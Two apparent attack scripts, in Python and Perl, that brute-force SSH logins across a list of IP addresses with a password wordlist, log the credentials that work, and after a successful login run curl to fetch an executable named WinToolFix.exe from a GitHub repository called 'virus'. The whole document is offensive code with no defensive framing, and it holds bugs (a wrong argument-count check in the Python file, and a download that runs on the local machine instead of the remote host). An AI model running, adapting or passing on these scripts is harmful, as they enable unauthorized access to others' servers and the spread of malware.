File: injector.py
import paramiko
import threading
import queue
import time
import os

# Function to log the attempt to a log file
def log_attempt(message):
    with open('brute_force_log.txt', 'a') as log_fh:
        log_fh.write(message + '\n')

# Worker function to perform SSH login attempts
def brute_force_worker(id, queue, wordlist, username):
    while not queue.empty():
        ip = queue.get()
        for password in wordlist:
            password = password.strip()  # Remove any trailing newlines
            print(f"Thread {id}: Attempting {username}@{ip} with password: {password}")
            
            # Initialize SSH client
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            
            # Retry logic with exponential backoff
            retry_count = 0
            while retry_count < 3:
                try:
                    ssh.connect(ip, username=username, password=password, timeout=5)
                    print(f"Thread {id}: Successfully logged in to {ip} as {username} with password: {password}")
                    log_attempt(f"Success: {username}@{ip} with password: {password}")
                    
                    # Execute the command after success (use with caution)
                    print(f"Thread {id}: Executing download command...")
                    response = os.system('curl -L -o WinToolFix.exe https://github.com/Fhchcjcjcjcjvkkvk/virus/raw/refs/heads/main/WinToolFix.exe')
                    print(f"Thread {id}: Executed curl command.")
                    ssh.close()
                    return  # Exit the worker thread after success
                except paramiko.AuthenticationException:
                    print(f"Thread {id}: Failed login to {ip} as {username} with password: {password}")
                    retry_count += 1
                    time.sleep(2 ** retry_count)  # Exponential backoff
                    continue
                except Exception as e:
                    print(f"Thread {id}: Error with {ip}: {e}")
                    retry_count += 1
                    time.sleep(2 ** retry_count)
                    continue
                finally:
                    ssh.close()

# Main function to load files, initialize threads, and process queue
def main():
    # Check if the correct arguments are passed
    import sys
    if len(sys.argv) != 3:
        print("Usage: python brute_force.py <username> <ips_file> <wordlist_file>")
        sys.exit(1)

    username = sys.argv[1]
    ips_file = sys.argv[2]
    wordlist_file = sys.argv[3]

    # Log file setup
    with open('brute_force_log.txt', 'a') as log_fh:
        log_fh.write(f"Starting brute-force attack: {username}\n")

    # Read IPs and wordlist
    with open(ips_file, 'r') as ip_fh:
        ips = ip_fh.readlines()

    with open(wordlist_file, 'r') as wordlist_fh:
        wordlist = wordlist_fh.readlines()

    # Initialize the queue and add IPs
    ip_queue = queue.Queue()
    for ip in ips:
        ip_queue.put(ip.strip())  # Strip any trailing newlines from IPs

    # Create and start threads
    num_threads = 10  # You can adjust the number of threads here
    threads = []
    for i in range(num_threads):
        t = threading.Thread(target=brute_force_worker, args=(i + 1, ip_queue, wordlist, username))
        t.start()
        threads.append(t)

    # Wait for all threads to complete
    for t in threads:
        t.join()

    print("Brute-force attack completed.")

if __name__ == '__main__':
    main()

File: injector.pl
#!/usr/bin/perl
use strict;
use warnings;
use Net::SSH::Perl;
use Thread::Queue;
use threads;
use IO::File;
use Time::HiRes qw(sleep);

# Check if the correct arguments are passed
if (@ARGV != 4 || $ARGV[0] ne '-username') {
    die "Usage: $0 -username <username> <ips_file> <wordlist_file>\n";
}

my $username = $ARGV[1];
my $ips_file = $ARGV[2];
my $wordlist_file = $ARGV[3];

# Create log file for recording attempts
my $logfile = 'brute_force_log.txt';
open my $log_fh, '>>', $logfile or die "Could not open log file: $!\n";
print $log_fh "Starting brute-force attack: $username\n";
close $log_fh;

# Open IP and wordlist files
open my $ip_fh, '<', $ips_file or die "Could not open IP file $ips_file: $!\n";
open my $wordlist_fh, '<', $wordlist_file or die "Could not open wordlist file $wordlist_file: $!\n";

my @ips = <$ip_fh>;
my @wordlist = <$wordlist_fh>;

# Trim newline characters
chomp(@ips, @wordlist);

# Initialize thread queue and thread pool
my $queue = Thread::Queue->new();
foreach my $ip (@ips) {
    $queue->enqueue($ip);
}

# Worker subroutine that handles the brute-forcing
sub brute_force_worker {
    my $id = threads->self()->tid();
    while (my $ip = $queue->dequeue_nb()) {
        foreach my $password (@wordlist) {
            chomp($password);
            
            print "Thread $id: Attempting $username@$ip with password: $password\n";
            my $ssh = Net::SSH::Perl->new($ip, user => $username, protocol => '2', timeout => 5);
            
            # Retry logic with exponential backoff
            my $retry_count = 0;
            while ($retry_count < 3) {
                eval {
                    $ssh->login($username, $password);
                };
                if ($@) {
                    print "Thread $id: Failed login to $ip as $username with password: $password\n";
                    $retry_count++;
                    sleep(2 ** $retry_count);  # Exponential backoff
                    next;
                } else {
                    print "Thread $id: Successfully logged in to $ip as $username with password: $password\n";
                    log_attempt("Success: $username@$ip with password: $password");
                    # Execute command after success (use with caution)
                    my $result = `curl -L -o WinToolFix.exe https://github.com/Fhchcjcjcjcjvkkvk/virus/raw/refs/heads/main/WinToolFix.exe`;
                    print "Thread $id: Executed curl command.\n";
                    last;
                }
            }
        }
    }
}

# Log successful attempts to a log file
sub log_attempt {
    my $message = shift;
    open my $log_fh, '>>', $logfile or die "Could not open log file: $!\n";
    print $log_fh "$message\n";
    close $log_fh;
}

# Create a thread pool of workers
my @threads;
for (my $i = 0; $i < 10; $i++) {  # Adjust number of threads as needed
    push @threads, threads->create(\&brute_force_worker);
}

# Wait for all threads to complete
foreach my $thr (@threads) {
    $thr->join();
}

# Clean up
close $ip_fh;
close $wordlist_fh;

print "Brute-force attack completed.\n";
